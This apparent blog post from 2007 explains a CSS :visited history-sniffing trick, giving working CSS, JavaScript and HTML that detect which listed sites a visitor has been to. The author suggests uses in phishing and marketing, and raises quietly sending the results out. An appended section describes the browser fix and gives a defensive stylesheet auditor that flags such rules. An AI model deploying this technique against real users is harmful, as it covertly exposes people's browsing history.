The shared thoughts, ideas and musings of a web developer in Dublin

Asking for your user’s browser history

Posted: December 3rd, 2007 | Author: Ben | Filed under: Uncategorized | No Comments »

This is a trick vulnerability I learnt about from a talk I went to by Rasmus Lerdorf called ‘Exploring The Broken Web’. He took delegates on a 30 minute whirlwind tour of security vulnerabilities on the internet, specifically what can be done with XSS combined with a bit of social engineering.

He only briefly touched on an area that interested me. He showed how a developer can check a user’s browser history, simply by asking for it.

The trick is to use a small (and very simple) piece of JavaScript along with some CSS to find out which websites a user has visited, from a list you provide.

Rasmus mentioned the script as something of use to phishers (they can find out which banks you bank online with and send you the appropriate phishing emails). I saw a less immoral use for it (although I won’t deny it’s still immoral): purely for marketing statistics. If I had a site selling t-shirts, like www.bensfunkytshirts.com I could use this script to find out if my visitors had also been to threadless, bustedtees and designbyhumans – or any other site.

Here’s the CSS:

/* Collapse every link to zero width so nothing is shown */
#links a {width: 0px; overflow: hidden;}
#links div {margin: 0; padding: 0;}
a {position: absolute;}
/* The key rule: visited links are nudged 1px to the right, which the script reads back via offsetLeft */
a:visited {left: 1px;}

Here’s the JavaScript:

onload = function() {
  var links = document.getElementsByTagName('a');
  var visited = [];
  var i;

  // The stylesheet moves visited links to left: 1px, so offsetLeft
  // leaks the visited state of each link in the list.
  for (i = 0; i < links.length; i++) {
    if (links[i].offsetLeft == 1) visited.push(links[i].id);
  }

  // Reveal the results on the page. Note that document.write called
  // after load replaces the existing document with this output.
  for (i = 0; i < visited.length; i++) {
    document.write('You have been to ' + visited[i] + '<br />');
  }
};

Finally, here’s the HTML:

<div id="links">
<div><a id="Yahoo" href="http://www.yahoo.com/">.</a></div>
<div><a id="Google" href="http://www.google.com/">.</a></div>
<div><a id="BBC-News" href="http://news.bbc.co.uk/">.</a></div>
<div><a id="SlashDot" href="http://slashdot.org/">.</a></div>
</div>

I’ve put an example of the script working up here:
http://www.hostengage.com.au/dev/historyInquisition/

If I were to use a simple piece of Ajax, or to stick the sites I know you’ve visited into a simple hidden form, I could easily learn far more about your browsing habits than you would want me to know.
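As an added example, not part of the original post: browsers have since closed this hole (Firefox and Chrome from about 2011, the others following) by laying out and reporting :visited links as if they were unvisited for every property except a small set of colour properties, so the offsetLeft check above now reads 0 regardless of history. That same colour-only allow-list makes a handy review check for stylesheets you ship or embed from third parties, since a :visited rule that touches a layout property is either a mistake or an attempt at this trick. The auditor below is written for Node, assumes a flat stylesheet with no nested @-rules, and runs over a constructed sample made from the rules above plus one benign colour rule.

```javascript
// Added example (not the original post's code): flag ":visited" rules that
// use anything other than the colour properties browsers still honour.

// Core set of properties modern browsers apply for :visited (some allow a
// few more colour properties; this is the common subset, an assumption).
const ALLOWED_VISITED_PROPS = new Set([
  'color', 'background-color', 'border-color',
  'border-top-color', 'border-right-color',
  'border-bottom-color', 'border-left-color',
  'outline-color', 'column-rule-color', 'fill', 'stroke',
]);

// Parse a flat stylesheet into { selector, declarations } rules.
// Assumes no @media or other nested blocks.
function parseRules(css) {
  const rules = [];
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(css)) !== null) {
    const selector = m[1].trim();
    const declarations = m[2]
      .split(';')
      .map((d) => d.trim())
      .filter(Boolean)
      .map((d) => {
        const i = d.indexOf(':');
        return {
          prop: d.slice(0, i).trim().toLowerCase(),
          value: d.slice(i + 1).trim(),
        };
      });
    rules.push({ selector, declarations });
  }
  return rules;
}

// Return every declaration in a :visited rule that a browser would refuse
// to apply; each finding is a candidate history-sniffing pattern.
function auditVisitedRules(css) {
  const findings = [];
  for (const rule of parseRules(css)) {
    if (!/:visited\b/.test(rule.selector)) continue;
    for (const { prop, value } of rule.declarations) {
      if (!ALLOWED_VISITED_PROPS.has(prop)) {
        findings.push({ selector: rule.selector, prop, value });
      }
    }
  }
  return findings;
}

// Constructed sample: the stylesheet from the post plus one harmless rule.
const SAMPLE_CSS = `
#links a {width: 0px; overflow: hidden;}
#links div {margin: 0; padding: 0;}
a {position: absolute;}
a:visited {left: 1px;}
a:visited {color: purple;}
`;

for (const f of auditVisitedRules(SAMPLE_CSS)) {
  console.log(`suspicious :visited rule "${f.selector}": ${f.prop}: ${f.value}`);
}
```

Only the `left: 1px` rule is reported; the `color: purple` rule is exactly what :visited is still allowed to do. The parser is deliberately minimal, so run it on flattened CSS (or extend it for @media blocks) before trusting a clean result.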

Update (2008-06-12)
I’ve finally got round to putting together an example of this working.
